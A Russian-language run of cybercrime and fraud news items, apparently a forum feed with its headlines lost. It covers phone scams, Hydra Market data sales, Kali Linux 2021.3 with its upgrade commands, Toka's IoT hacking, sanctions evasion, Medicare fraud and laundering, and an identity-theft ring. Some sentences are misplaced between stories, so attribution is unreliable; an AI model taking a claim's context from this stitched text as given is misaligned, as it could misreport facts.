Злоумышленники звонили потенциальным жертвам, представляясь представителями банков или полицейскими. Людей уверяли, якобы посторонние лица получили доступ к их банковским счетам и вот-вот планируют присвоить деньги. Для «сохранения» сбережений людям предлагали снять наличные самостоятельно и передать ее так называемому «курьеру» от банка, после чего обещали зачислить деньги на «безопасный счет».
Таким образом фигуранты присвоили более 5 миллионов гривен. Пострадавших сейчас устанавливают правоохранители.
Полицейские провели обыски в доме организатора схемы и пресекли деятельность мошеннического call-центра. По результатам изъяты банковские карточки, мобильные телефоны и компьютерная техника.
Одновременно обыски проходили на территории государства Израиль, там правоохранители задержали двух мужчин, которые выполняли функцию «курьеров».
По данному факту открыто уголовное производство по ч. 3 ст. 190 (Мошенничество) Уголовного кодекса Украины. Санкция статьи предусматривает до восьми лет лишения свободы.
Следственные действия продолжаются.
Им вменяется организация преступного сообщества.
Обвинительное заключение по уголовному делу, связанному с торговлей украденными персональными данными россиян из Федеральной налоговой службы, Пенсионного фонда, Министерства внутренних дел и банков в даркнет маркетплейсе "Hydra Market", было утверждено Генеральной прокуратурой России.
Материалы в отношении хакеров, являющихся фигурантами дела, переданы во Всеволожский городской суд Ленинградской области для рассмотрения дела по существу. По делу проходят Сергей Юрцовский, Андрей Садырев, Анжелика Мартыненко и Дмитрий Любич. Им вменяется организация преступного сообщества, неправомерный доступ к компьютерной информации, разглашение сведений, составляющих налоговую и банковскую тайну.
В указанный период они несколько раз незаконно получали доступ к информации, скопировав ее из баз данных ФНС, ПФР, Бюро кредитных историй, МВД и банков. Далее, информация, незаконно полученная о более чем 6.5 тыс. физических лиц, была продана заказчикам.
Они обвиняются в организации преступного сообщества или участии в нем (согласно части 1, 2, 3 статьи 210 УК РФ), в неправомерном доступе к компьютерной информации (согласно части 4 статьи 272 УК РФ), и в незаконном получении и раскрытии сведений, которые составляют налоговую и банковскую тайну (согласно части 3 статьи 183 УК РФ).
Напомним в апреле 2022 года основателя подпольного магазина «Hydra Market» арестовали в Москве . Дмитрий Павлов обвиняется в незаконном сбыте наркотиков в особо крупном размере, ему грозит от 15 до 20 лет лишения свободы
Ранее во вторник, 5 апреля 2022 года, Федеральное ведомство уголовной полиции Германии (Bundeskriminalamt, BKA) закрыло известную подпольную русскоязычную торговую площадку Hydra Market, изъяли ее серверы и конфисковали 543 биткойна (около 23 млн евро по текущему курсу).
В правоохранительные органы обратился с заявлением гражданин, который сообщил о совершенном в отношении его факте интернет-мошенничества. Планируя приобрести автомобиль, мужчина некоторое время изучал объявления на сайте ОЛХ, пока не нашел информацию о продаже заинтересовавшего его автомобиля по привлекательной цене. Речь шла о пригоне внедорожника Hyundai Tucson из Литвы.
Гражданин связался с автором объявления и узнал, что тот готов выехать за интересующим авто при условии оплаты задатка 5,800 гривен. В качестве гарантий выполнения работы, мошенник прислал фото «своего» паспорта по вайберу, предложив проверить достоверность паспортных данных, если заказчик боится обмана.
Получив деньги, мошенник написал, что выезжает в Литву за автомобилем. На следующий день он перезвонил и сообщил, что забрал автомобиль, стоит в очереди на границе и в 3 часа будет заезжать на терминал Украины. Для оплаты процедуры растаможки автомобиля ему срочно нужны 80 тысяч гривен.
Заказчик автомобиля стал переводить деньги на указанную карту, но столкнулся со сложностями из-за ограничений на сумму транзакции. Разбив перевод на 4 части, спустя некоторое время, он перевел необходимую сумму, но «перегонщик» сообщил, что из-за проволочек с переводом денег, он пропустил свою очередь на терминал и теперь ему нужно заплатить еще 47 тысяч гривен.
Покупатель, для которого обладание желанным автомобилем казалось уже таким близким, пообещал, что пришлет необходимые деньги с кредитной карточки жены. После того, как супруги смогли переслать еще 44 тысячи на новую карту, которую указал мошенник, он сообщил, что процесс растаможки запущен и продлится до обеда следующего дня. Однако на следующий день его телефон уже оказался выключен.
В рамках возбужденного уголовного дела, следователи опросили потерпевшего, получили информацию о движении денег по счетам банковских карт и даже получили сведения от Госфинмониторинга о деятельности лица, возможно причастного к совершению данной аферы.
Тем не менее, по прошествии года, следствие так и не смогло найти предположительно подозреваемого человека и вручить ему подозрение. Естественно, ведь в подобных, довольно распространенных схемах мошенники используют карты подставных лиц и искать их нужно, прежде всего, через данные мобильных операторов.
Объясняя отсутствие положительных результатов расследования, правоохранители указали на «сложный характер дела», отсутствие точных сведений о личности подозреваемого, а также невозможность доказательства изложенных потерпевшим обстоятельств, по причине отсутствия свидетелей.
По просьбе следователя, судья продлил срок данного уголовного расследования еще на полгода.
Kali Linux 2021.3 был выпущен вчера компанией Offensive Security и включает новый набор инструментов, улучшенную поддержку виртуализации и новую конфигурацию OpenSSL, которая увеличивает поверхность атаки.
Kali Linux - это дистрибутив Linux, разработанный для профессионалов в области кибербезопасности и этических хакеров для проведения тестирования на проникновение и аудита безопасности.
В этом выпуске команда Kali Linux представляет следующие новые функции:
OpenSSL: все устаревшие протоколы включены
Многие дистрибутивы Linux отключают старые небезопасные протоколы в OpenSSL,
такие как TLS 1.0 и TLS 1.1, для правильной защиты устройств и веб-сайтов.
Однако, поскольку Kali Linux является дистрибутивом для тестирования на
проникновение, имеет смысл включить все протоколы, чтобы вы могли нацеливаться
на все системы, даже на старые устройства, использующие небезопасные
протоколы.
В этом выпуске Offensive Security настраивает OpenSSL для широкой
совместимости, что означает, что они позволяют использовать старые шифры и
небезопасные протоколы для увеличения поверхности атаки.
Расширенная поддержка виртуализации
Образ Kali Live получил расширенную поддержку для работы в виртуализированных
средах, таких как VMware, VirtualBox, Hyper-V и QEMU + Spice.
Offensive Security заявляет, что теперь вы можете использовать Live-образ в
виртуализированной среде и автоматически получать функции копирования,
вставки, удаления и удаления без необходимости устанавливать гостевые
дополнения или другое гостевое программное обеспечение.
В тестах BleepingComputer с запущенной сборкой Kali Linux 2021.3 Live в
последней версии VirtualBox для Windows изменение размера дисплея, а также
копирование и вставка работали из коробки.
Однако нам не удалось заставить работать функцию перетаскивания.
Новые инструменты добавлены в Kali Linux 2021.3
Это не была бы новая версия Kali Linux без некоторых новых инструментов и утилит, которые перечислены ниже:
Обновленный сайт Kali-Tools
Offensive Security обновил сайт Kali-Tools, обновив дизайн и улучшив скорость. Кроме того, OffSec надеется вскоре сделать этот репозиторий документации доступным в автономном режиме.
Расширенная поддержка ARM
Команда Kali Linux продолжает улучшать поддержку устройств ARM, внося следующие изменения:
Благодаря @cyrus104 у нас теперь есть сборочный
скрипт для поддержки платы Gateworks Newport, и он также добавил для нее
документацию.
@Re4son предоставил сборочный скрипт для
Pi-Tail на базе Raspberry Pi Zero W (дополнительную информацию можно найти
здесь).
Кроме того, скрипт сборки «P4wnP1» на основе RaspberryPi Zero W претерпел
некоторые серьезные изменения.
Все изображения должны окончательно изменить размер файловой системы при первой загрузке.
Теперь мы повторно генерируем сертификат snakeoil по умолчанию, который
исправляет несколько инструментов, которые ранее не запускались.
По умолчанию для изображений используются iptables-legacy и ip6tables-legacy для поддержки iptables.
Теперь мы устанавливаем языковой стандарт по умолчанию en_US.UTF-8 для всех изображений, вы, конечно, можете изменить его на свой предпочтительный языковой стандарт.
Пользователь Kali в образах ARM теперь по умолчанию входит во все те же группы, что и базовые образы, и использует zsh в качестве оболочки по умолчанию. Вы можете изменить оболочку по умолчанию с помощью инструмента kali-tweaks, который также предустановлен.
Образы Raspberry Pi теперь могут использовать файл wpa_supplicant.conf в разделе / boot.
Образы Raspberry Pi теперь поставляются с предустановленными kalipi-config и kalipi-tft-config.
Ядро Pinebook Pro обновлено до версии 5.14, и теперь вы получаете сообщения на ЖК-экране во время загрузки вместо мигающего курсора до запуска X.
Как получить Kali Linux 2021.3
Чтобы начать использовать Kali Linux 2021.3, вы можете обновить существующую установку или загрузить образы ISO для новых установок и живых дистрибутивов.
Для тех, кто обновляет предыдущую версию, включая установку в подсистеме Windows для Linux (WSL), вы можете использовать следующие команды для обновления до последней версии.
C#:Copy to clipboard
echo "deb http://http.kali.org/kali kali-rolling main non-free contrib" | sudo tee /etc/apt/sources.list
sudo apt update && sudo apt -y full-upgrade
cp -i /etc/skel/.bashrc ~/
cp -i /etc/skel/.zshrc ~/
chsh -s /bin/zsh
[ -f /var/run/reboot-required ] && sudo reboot -f
После завершения обновления вы можете сделать это, если обновление до Kali Linux 2021.3 прошло успешно, используя следующую команду:
C#:Copy to clipboard
grep VERSION /etc/os-release
Источник: https://www.bleepingcomputer[.]com/...released-with-new-pentest- tools-improvements/
Что касается социальных сетей, то серьезные риски связаны с распространением в них информации, восхваляющей насилие, терроризм, направленной на радикализацию населения.
Предложение РФ по созданию универсальной системы депонирования ключей шифрования от мобильных приложений для оперативного доступа правоохранительных органов к данным в целом позитивно воспринято зарубежными партнерами, сообщил в интервью РИА Новости замглавы МИД РФ Олег Сыромолотов.
"В этом контексте хотел бы обратить внимание на контртеррористическую
инициативу ФСБ России по созданию универсальной системы доверенного хранения
(депонирования) ключей шифрования от мобильных приложений для оперативного
доступа правоохранительных органов к зашифрованной информации", - рассказал
он.
"Не буду углубляться в детали. Скажу только, что это предложение в целом
воспринято позитивно зарубежными партнерами", - заметил замглавы МИД РФ.
"Что касается социальных сетей, то серьезные риски связаны с распространением
в них информации, восхваляющей насилие, терроризм, направленной на
радикализацию населения. Неоднократно наблюдали примеры использования этих
инструментов для целевого воздействия на отдельные социальные группы, прежде
всего молодежь, дестабилизации обстановки в странах и регионах мира", -
обратил внимание Сыромолотов.
В 2017 году, глава ФСБ Александр Бортников предложил создать «доверенную и
прозрачную для контроля систему депонирования ключей шифрования, генерируемых
мобильными приложениями» для пресечения бесконтрольного их использования
террористами. Согласно его словам, выработать единые законные правила
обращения с ключами шифрования и доступа к ним можно только при тесном
сотрудничестве между спецслужбами, операторами связи и телекоммуникационными
компаниями. «При этом права и свободы законопослушных граждан в части
сохранения конфиденциальности должны быть полностью соблюдены», - подчеркнул
глава ведомства.
Американские правительственные агентства постоянно легально взламывают мобильные телефоны или электронные письма: вспомните, как ФБР прослушивает подозреваемого наркобарона или как АНБ отслеживает электронную почту на предмет террористических заговоров.
Но сейчас растет интерес к взлому других видов устройств, которыми пользуются люди, например камер безопасности, подключенных к Wi-Fi, и других продуктов IoT.
Toka, израильский стартап, поддерживаемый Andreessen Horowitz, специализируется именно на такой работе. Ранее он привлек к себе внимание благодаря статье в газете Haaretz за 2022 год, в которой подробно описывались его заявления о возможности получать и даже удалять записи с камер безопасности.
Сейчас компания ищет «директора по работе с клиентами в США» для «поддержки роста бизнеса на правительственном рынке США». Для этой должности требуется «большой опыт продаж технологий в Министерствe обороны и агентствах национальной безопасности».
Toka также ищет инженера по работе с клиентами в свою североамериканскую команду, который будет отвечать за помощь своим клиентам в «развертывании, обучении и внедрении». Опыт работы с федеральными правоохранительными органами считается преимуществом.
Компания Toka сообщила TechCrunch, что она «в основном заполняет открытые вакансии», и отказалась от дальнейших комментариев по поводу своей деятельности в правительстве США.
«Мы можем сказать, что Toka продает свою продукцию только военным, организациям, занимающимся вопросами внутренней безопасности, разведке и правоохранительным органам США и их ближайших союзников, которые используют нашу продукцию в соответствии с местным законодательством», - заявил представитель компании.
Взлом IoT-продуктов становится все более распространенным явлением в мире обороны и разведки.
Израиль, где находится штаб-квартира Toka, приобрел некоторую известность благодаря подобному сбору разведданных. В начале этого года «Хезболла» предупредила жителей Ливана выключить камеры наблюдения, чтобы Израиль не смог взломать их для обнаружения целей.
Но подобные технологии не обязательно должны ограничиваться зонами боевых действий. В прошлом месяце TechCrunch сообщил, что Бен Хоровиц из компании a16z пытался пожертвовать средства на покупку программного обеспечения Toka для полицейского управления Лас-Вегаса. По словам представителя Toka, он не согласился.
С момента своего основания в 2018 году компания Toka публично привлекла 37,5 млн долларов от таких инвесторов, как a16z, Dell Capital и других. В 2022 году газета Haaretz ранее сообщала, что Toka стремится сотрудничать с американским спецназом и неназванным разведывательным агентством США.
Компания Toka старается избегать внимания к израильским шпионским компаниям, таким как NSO Group, находящаяся под санкциями США, публично обещая, что она ведет дела только с правительствами из «избранного списка стран» с хорошей репутацией в области гражданских свобод и коррупции.
Компания Toka заявлена как участник конференции в ОАЭ в 2021 году, а в начале этого года наняла вице-президента по международным продажам, который ранее работал в Cellebrite, еще одной неоднозначной израильской киберкомпании. Однако Toka сообщила TechCrunch, что у нее нет клиентов в ОАЭ и она тщательно следит за своими международными продажами.
«Мы регулярно проверяем этот список стран, используя внешние оценки по целому ряду вопросов, включая гражданские свободы, верховенство закона и коррупцию»,
source: [https://techcrunch.com/2024/12/06/a...-into-security-cameras-and- other-iot-devices/](https://techcrunch.com/2024/12/06/a16z-backed-toka-wants- to-help-us-agencies-hack-into-security-cameras-and-other-iot-devices/)
Как сообщили в федеральной прокуратуре штата Аляска в Анкоридже, проживающие там натурализованные граждане США Сергей Нефедов и Марк Шумович обвиняются в незаконном экспорте товаров из США и в таких сопутствующих преступлениях, как преступный сговор, контрабанда и отмывание денег, за что им грозит в лучшем случае до 20 лет лишения свободы, а если складывать сроки постатейно, то втрое больше.
40-летний Нефедов живет в Анкоридже, а 35-летний Шумович в городке Бельвю в штате Вашингтон, а сообщение министерства юстиции об их аресте по местам жительства 12 июня озаглавлено «Двое рожденных в России граждан США арестованы за отправку в Россию предметов роскоши на полмиллиона долларов». Речь в обвинении идёт о снегoмобилях и запчастях к ним, что для досуга вполне можно считать «Luxury Goods». Интересно, что практически во всех сообщениях об этом русскоязычных СМИ слово «snowmobile» переведено как «снегоуборщик», а не «снегомобиль», что затрудняет понятие роскоши, и с таким же успехом российской роскошью можно считать газонокосилку, а следом за ней пылесос и мясорубку. Пока же придется запомнить, что лыжи в России средство передвижения, а снегомобиль роскошь.
Завотделом национальной безопасности министерства юстиции Мэтью Олсен отметил, что «это дело последний пример нашей решимости привлекать к ответу тех, кто нарушает законы о санкциях, и наше намерение наложить на российское правительство цену за незаконное вторжение в Украину. Федеральный прокурор Аляски Лейн Такер в пресс-релизе заявил, что «нарушение законов об экспорте влечет серьёзные последствия для нарушителей в Соединённых Штатах и за рубежом, и наша прокуратура продолжит работу с ФБР, следователями министерства внутренней безопасности и министерством торговли». Помощник министра торговли по контролю за экспортом Мэтью Акселрод ближе других к сути дела сообщил, что «скрытая продажа снегомобилей в России нарушает наши экспертные законы вне зависимости от того, идёт ли она напрямую или в обход через Гонконг», и тоже упомянул о связи наложенных на Россию санкций с ее нападением на Украину. Ларисса Напп, завотделом нацбезопасности ФБР, добавили, что ее бюро с не меньшей решимостью намерено положить конец «любым пыткам нелегально доставлять американские товары в подсанкционные государства», и с ней согласились начальник отделения ФБР в Анкоридже Ребекка Дей и Робер Хаммер из следственного отдела министерства внутренней безопасности.
Всё это я к тому, какой буран вызвали Нефёдов с Шумовичем своими снегомобилями. Из 35 страниц обвинения следует, что в Анкоридже Нефедову принадлежали зарегистрированные там компании Alaska Sled Tours и Absolut Auto Sales, и первая, судя по названию, занималась «снегоходным» туризмом, а вторая торговала автотранспортом, включая снегоходы. У Шумовича никаких бизнесов не было, а кроме этих двоих по делу проходят сообщниками два россиянина – СС-1, у которого в России компания, торгующая снегоходами и другим транспортом (в деле “Russian Company”), и СС-2, который живет в Гонконге, где у него «Hong Kong Company». В деле также значится крупная канадская компания Bombardier Recreational Products (“BRP”), которая выпускает мотовездеходы, мотоциклы, персональные плавсредства и снегомобили, включая модель Ski-Doo. Далее следует разъяснение, что такое Закон о контроле экспорта (Export Control Reform Act или ECRA), Закон о международных чрезвычайных экономических полномочиях (The International Emergency Economic Powers Act или IEEPA) и президентский Указ (Executive Order) от 11 марта 2022 года, который, в числе прочего, запрещает «экспорт, реэкспорт, продажу и прямые или косвенные поставки из США в Россию предметов роскоши».
Как утверждает обвинение, минимум с марта 2022 по май 2023 года Нефедов с Шумовичем через сообщников в России и Гонконге нарушали эти законы и указ, введенные после 24 марта 2022 года, с начала Специальной военной операции (СВО) российской армии против Украины. Для этого СС-1, который торговал снегоходами в России, заключил с СС-2 в Гонконге контракт на поставку в Россию снегоходов Ski-Doo и комплектующих частей к ним на общую сумму почти миллион долларов. Снегоходы этой модели стоят от одной до четырнадцати тысяч долларов. Помимо этого, СС-1 приготовил для компании СС-2 документы на приобретение у компании Нефедова Absolut Auto Sales снегоходов и других видов мотоспорта, при этом сообщив экспедитору, что эти товары нужно доставить из США в Россию «через третью страну», так как прямые поставки «остановились». Обвинение приводит эти слова в кавычках, то есть это прямая речь СС-1, очевидно тайно записанная. Обвинение перечисляет больше двух десятков таких доставок из Сиэтла в штате Вашингтон через Гонконг во Владивосток, в одном случае с транзитом в Южной Корее. Расследование было несложным, поскольку в распоряжение следователей имелись все необходимые документы. Как видно из пресс-релиза, к нему были привлечены ФБР, министерство внутренней безопасности и министерство торговли, а корродировала расследование объединенная спецгруппа «Клептохваты» (Task Force KleptoCapture), созданная министерством юстиции в марте 2022 года, опять же после нападения России на Украину.
Обвинение Нефедову и Шумовичу было предъявлено федеральной прокуратурой Аляски 12 июня, а на следующий день у нас в Манхэттене федеральный судья Грегори Вудс приговорил 46-летнего узбека и тоже натурализованного гражданина США Муххитдина Кадырова к 30 месяцам лишения свободы и трем годам надзора после освобождения за отмывание денег, незаконно нажитых на аферах с программами здравоохранения Medicare и Medicaid. Проживающий в Квинсе Кадыров открыл на чужое имя банковские счета трех подставных компаний-пустышек (shell company) и прокачал через них больше 6 млн долларов, причем больше 4 млн для своего сообщника и земляка 36-летнего Нерика Ильяева. Арестованные в 2022 году, в октябре 2023 Ильяев и Кадыров признали себя виновными, и в апреле этого года судья Вудс отправил Ильяева за решетку на 4 года с последующим надзором тоже на три года. Оба обязались погасить 6 млн долларов незаконной наживы.
Ильяев подтвердил судье Грегори Вудсу, что виновен только в мошенничестве и согласился получить за это до 10 лет лишения свободы, а Кадыров сознался в мошенничестве и отмывании денег, за что ему грозило вдвое больше. Как сообщил в пресс-релизе манхэттенский федеральный прокурор Дамиан Уильямс, «Нерик Ильяев дерзко обманул федеральные программы Medicare и Medicare, а также нью- йоркскую программу автомобильных страховок ‘No-fault’ больше чем на 6 млн долларов. Для выполнения этих афер Ильяев получал медикаменты из незаконных источников и вместе с сообщниками платил откаты людям с низким доходом. Муххиддин Кадыров обманывал программы Medicare и Medicaid, отмывая миллионы незаконно полученных долларов через подставные компании. Ильяев и Кадыров старательно скрывали свои роли в этих преступлениях, в частности пользуясь личными данными других лиц. Теперь Ильяев и Кадыров заплатят за свои преступления, и эта прокуратура не прекратит преследовать тех, кто наживается на обмане нашей системы здравоохранения».
Судя по предварительному обвинению и другим документам дела, с февраля 2021 по март 2022 года Ильяеву принадлежала в Манхэттене аптека, которая проходит как «Pharmacy-1». Через нее Ильяев платил больным СПИДом с низким доходом, то есть имеющим право на страховки Medicare или Medicaid, и вписывал на их имя дорогие лекарства от этой болезни и по этим рецептам получал их в не уточненных, но незаконных и известных следствию источниках. От имени своей аптеки он представлял счета на эти лекарства программам Medicare и Medicaid, а заметая следы, представлялся другим лицом (“Individual-1”), которому якобы принадлежала «Pharmacy-1». В результате эти программы заплатили аптеке мошенника Ильяева примерно 5,2 млн долларов. Закрыв свою манхэттенскую аптеку в марте прошлого года, Нерик Ильяев открыл другую (“Pharmacy-2”) Квинсе и занялся примерно тем же под чужим именем «Individual-3». Но на сей раз он зарабатывал не на лекарствах от СПИДа, а на действующих в штатах Нью-Йорк и Нью-Джерси законах “No-Fault Laws”, которые «обязывают компании страхования автомобилей автоматически платить за некоторые виды ДТП, при условии законности требований». Поясняется, что при этом речь идет в основном о лечении пострадавших, причем виновник ДТП не устанавливается, а лечение покрывается на сумму до 50 тыс. долларов. Как и в (“Pharmacy-1”) Ильяев за откаты вербовал пострадавших (или мнимых пострадавших) в ДТП и заказывал для них «в незаконных источниках» дорогие лекарства, которые оплачивала страховка No-Fault. Кроме этого, он продавал эти лекарства другим аптекам, заработав в общей сложности примерно 1,2 млн долларов.
Муххиддин Кадыров отмывал незаконную прибыль, участвуя в том, что ФБР назвало «Сеть отмывания денег» (“Money Laundering Network”), которую бюро расплетало с 2020 года. Суть этой сети состояла в нехитрой и давно опробованной затее, в которой чеки страховых компаний за незаконные операции депонировались в банки на счета специально открытых компаний-пустышек. Эти пустышки часто выдавали себя за компании оптовой торговли и вставляли в свои названия слово «оптовая», чтобы полученные ими чеки не вызывали подозрений у банков и спецслужб. Затем владельцы таких компаний переводили деньги с их счетов через не лицензированных посредников в банки за границей, в данном случае Узбекистан, а затем на эти деньги, минус долю посредников, через другие подставные компании приобретались товары в Китае или других странах. Эти товары законно и добросовестно доставлялись импортерам в Узбекистан, а те расплачивались за товары с находящимися в Узбекистане партнёрами американских аферистов или других американцев, решивших отмыть деньги таким способом.
О том, что помимо пресловутой «русской мафии в США, представленной в основном бывшими советскими евреями, существуют другие этнические организованные преступные группировки (ОПГ), известно давно.
После распада СССР «русскую мафию» переименовали в «евразийскую», обозначив этим постсоветское пространство, и обнаружили грузинскую и азербайджанскую мафии, ну и, конечно, “Армянскую Силу» (Armenian Power) на Западном побережье, представленную выходцами из этой бывшей советской республики. По данным наших силовиков, эта ОПГ действует с 1998 года, состоит из этнических армян, насчитывает примерно 1200 человек и занимается убийствами, похищениями людей, грабежами, вымогательствами, торговлей наркотиками и кражами личных данных. Основной район активности “Армянской Силы» – Голливуд и «Маленькая Армения» - район Ист-Голливуда, пригорода Лос-Анжелеса, официально названный так в 2000 году. В 2010 году тогдашний манхэттенский федеральный прокурор Приит Бхарара назвал эту ОПГ «армяно-американской», а тогдашний начальник угрозыска нью- йоркского отделения ФБР Диего Родригес в интервью «Голосу Америки» назвал ее «второй волной евразийской организованной преступности в США». Эта ОПГ попала даже в сетевую «народную» энциклопедию, где сообщалось, что ее члены «обычно носят классическую одежду городских уличных бандитов: мешковатые штаны цвета хаки, помятые белые футболки, сетки для волос, темно-синие кепки и солнцезащитные очки в стиле LOCS. У многих татуировки и оружие». Там же отмечено, что «банды выходцев из Закавказья в целом в США составляют только 14 % от всего количества членов банд других этнических или расовых группировок».
Все так, но 14 марта федеральная прокуратура Южного округа Нью-Йорка в Манхэттене сообщила о новой ОПГ “Pure Armenian Blood”, что можно перевести как «Чистокровный Армянин», а сокращенно “P.A.B.”. Как пояснил нынешний прокурор Дамиан Уильямс, члены этой группировки «в течение почти 10 лет обогащали себя и своих преступных сообщников аферами, куда входило похищение чужих личных данных, и тратами миллионов чужих долларов без боязни последствий. Лидер этой изощренной организованной преступной группировки Нарек Марутян руководил этими аферами и пожинал неправедно собранные плоды. За это преступление ему предстоят годы тюрьмы. Данное расследование вновь подтверждает нашу неизменную решимость бороться с организованней преступностью во всех её формах». Годы тюрьмы, о которых упомянул прокурор Уильямс, для 33-летнего бруклинца Марутяна, который вместе с сообщниками был арестован 29 июня 2022 года и 17 августа прошлого года признал себя виновным в рэкете, означают 6 лет лишения свободы плюс возмещение ущерба в сумме $4,258.999.79 и такой же штраф, к чему его приговорил судья Виктор Марреро. Его брат Альберт, он же Або, Марутян сознался в том же и получил 51 месяц лишения свободы.
Вторым главным обвиняемым по делу «Чистокровного Армянина» № 20 Cr. 0652, а точнее «Сoединенные Штата против Нарека Марутяна и других», идет 40-летний Саро, он же Пол Мурадян из городка Голливуд во Флориде между Форт-Лодердейл и Майами. Как и Марутян признавший себя виновным в рэкете, Мурадян получил 10 месяцев лишения свободы, согласившись уплатить $517,502.00 в погашение ущерба и $50,190.00. штрафа. Кроме них были арестованы и признали себя виновными в рэкете «чистокровные армяне» братья Давит и Михаил (он же Мишо) Егояны, получившие соответственно 45 и 42 месяца лишения свободы, и Завен Еркарян, который признал вину в «мошенническом доступе к устройству», но еще не приговорен. Гохар Иллангозян согласился признать вину в лжесвидетельства и тоже ждет приговора, а Ваха Ховханисян получил 364 дня, то есть год и день лишения свободы, за отмывание денег, в чем тоже сознался. Как мне уже доводилось пояснять «год и день» лишения свободы - акт гуманизма судьи, поскольку согласно федеральному уложению о наказании приговор до года не подлежит досрочному освобождению.
Общая вина этой «великолепной восьмерки» состоит прежде всего в том, в том, что они, будучи организованней преступной группой этнических армян на территории США, действовали по по указанию и под защитой сообщника «СС-1», армянского «вора в законе», который жил в Лос-Анджелесе и в 2018 году был депортирован. Возможно, речь идет о воре в законе Артуре Казаряне по кличке Пзо, которого арестовали в октябре 2010 года вместе с десятками других обвиняемых по делу об обмане государственной системы медобслуживания для престарелых. В феврале 2013 года Пзо был приговорен к 37 месяцам лишениям свободы и 3 годам надзора после освобождения, после чего его должны были депортировать, так что процесс депортации вполне мог затянуться до 2018 года. В обвинении отмечено, что члены новой группировки носили отличительные знаки, включая татуировки (голова бородатого мужчины с буквами «P.A.B». на месте глаз и традиционные «воровские звезды»), а также спецодежду, головные уборы и футляры мобильников с тремя этими буквами. Помнится, в таких же регалиях, но с грузинским уклоном, щеголяли члены бруклинской ОПГ вора в законе Раждена Шулая.
Члены и сообщника группировки «P.A.B.» действовали через подконтрольные им бизнесы, включая расположенную в нью-джерсийском графстве Саффолк компанию Auto and Towing Inc., а в нью-йоркском Бруклине им принадлежала такая же компания Posh Cars Spa. «Как вожак отделения ‘P.A.B.’ в Нью-Йорке, - гласит обвинение, - Марутян управлял различными преступлениями, включая использование краденых личных данных, жульническое открытие и опустошение линий кредита; покупки по поддельным кредитным картам по предварительному сговору с местом этих покупок или по картам, которые были открыты обманным путем; продажа приобретенных такими способами товаров с целью получения прибыли и фальсификация документов для «очистки» кредита владельцев счетов, на чьи имена были открыты кредитные линии».… Читаешь это и умиляешься, до чего же верно то, что новое это хорошо забытое старое: ведь все эти изощрения ОПГ «Чистокровный Армянин» были в ходу наших бруклинских жуликов в конце прошлого века. Еще покойного Марата Балагулу обвиняли в том, что на самодельные кредитные карты он покупал шубы у владельцев меховых магазинов, которые знали об этом, и им же их продавал. «Будучи владельцем и руководителем двух таких бизнесов – продолжает обвинение, - Мурадян пользовался, полученными обманным путем, кредитными картами для фиктивных платежей, в обмен на которые не предоставлялись никакие законные товары или услуги. Он также поставлял членам ‘P.A.B.’ личную информацию о лицах, которых знал, а они использовали эту информацию для мошеннического получения дополнительных кредитных карт, которые использовались для других афер».
Приводя примеры преступлений, совершенных ОПГ «P.A.B.», обвинение утверждает, что в 2014 году Давит Егоян передал сообщнику СС-2 (которого не обвиняют) примерно 20 кредитных карт, закодированных данными, полученными преступным путем. Далее, 15 февраля 2015 года Мишо Егоян пытался прибрести по такой карте ювелирные изделия в магазине штата Нью-Джерси. 11 марта того же года Або Марутян отправил эсэмэску с фотографиями 1. Водительского удостоверения штата Калифорния на имя владельца кредитной карты (Account Holder-1) с его фамилией, датой рождения и адресом; и 2. Кредитной карты на то же имя, которая была использована для крупных покупок. 18 сентября того же 2015 года Нарек Марутян, Або Марутян и Мишо Егоян оплатили поддельной кредитной картой заказ номеров в отеле Лос-Анджелеса. 7 декабря 2015 года Мишо Егоян передал сообщнику СС-3 (которого не обвиняют) информацию о банковском счете на имя Account Holder-2, с помощью которого были открыты кредитные линии, покупки по которым не оплачены. Таких эпизодов обвинение приводит ещё 7, по 30 марта 2020 года, когда Мишо Егоян отправил Саро Мурадяну электронное письмо с сообщениями из банка по поводу счета на имя Account Holder-6, кредитной картой которого Мурадян оплачивал расходы своего бизнеса.
Хотя действовали «чистокровные армяне» по старинке и ничего нового в ремесло таких афер не внесли, наворовали они достаточно, хотя ни одного из них в базе данных федеральных тюрем не значится. Помнится, в октябре 2010 года манхэттенская федеральная прокуратура арестовала 44 человека, которых обвинили в самом мощном на то время налете на программу Medicare. Среди них были 26 «армяно-американцев», из которых 21 жил в Калифорнии и 5 в нью-йоркском Бруклине. Дело было громкое, и на российском сайте sungat.ru в Интернете развернулась полемика на вечную тему: «Какая мафия самая опасная?». Один участник написал, что «самая опасная Итальянская, но в США очень боятся Русскую». Другой написал, что «в США вообще все контролируют Евреи, по крайне мере в Нью-Йорке точно, а если кто-то думает, что в Нью-Йорке все под РМ (Русской мафией), то он глубоко ошибается. Да, Русская мафия самая жестокая мафия, с этим я согласен, у них жестокие методы, но она не самая опасная...». Третий заявил, что «Еврейская и армянская мафии сильнейшие сегодня. В Калифорнии армянская мафия рулит, они также владеют Францией и югом России, евреи же владеют сильной мафией в Москве и Нью-Йорке». А четвертый участник дискуссии (хотя их было гораздо больше) подвел итог: «Что за вопрос! Армянская мафия, потом Русская, а потом Итальянская. Армяне США и Европу почти всю держат, а также юг России».
Согласно материалам дела программист получил доступ к информационным системам «Единый реестр административных производств» и «Единая нотариальная информационная система Министерства юстиции РК». С их помощью он продал персональные данные как минимум девяти человек по Telegram.
«Вызывает опасение то, как IT-специалисту удалось заполучить личные данные казахстанцев. Оказывается, с 2019 года Эльнур А. обзавёлся связями среди сотрудников Департамента полиции Мангистауской области. Он помогал им отремонтировать компьютер, подключиться к сети, восстановить информацию», - сообщает Lada.kz со ссылкой на телеграм-канал Свидетель.kz.
Когда в январе 2022 года требования к информационной безопасности системы ИС «ЕРАП» ужесточились, хакер потерял доступ к ней. Тогда он под предлогом настройки сканера удалённо подключился к компьютеру столичного нотариуса, украл у неё ЭЦП-ключ и с его помощью получил доступ к ИС «ЕНИС».
Эльнуру А. предъявили обвинения сразу по трём статьям Уголовного кодекса: «Умышленный неправомерный доступ в информационную систему» (статья 205 часть 2), «Распространение сведений о частной жизни лица, составляющих его личную и семейную тайну, без его согласия» (статья 147 часть 4) и «Умышленное неправомерное завладение охраняемой законом информацией, содержащейся в информационной системе» (статья 208 часть 2 пункт 1). По совокупности преступлений ему назначили три года колонии средней безопасности.
Группа кардеров была арестована в торговом центре в американском штате Мэриленд. Трое молодых людей в возрасте от 21 до 25 лет вызвали подозрение своим поведением, из-за которого продавцы предположили что они пытаются совершать покупки с использованием чужих кредиток.
Бдительные сотрудники торгового центра сразу вызвали полицию. Прибывшим на место силовикам было на что посмотреть.
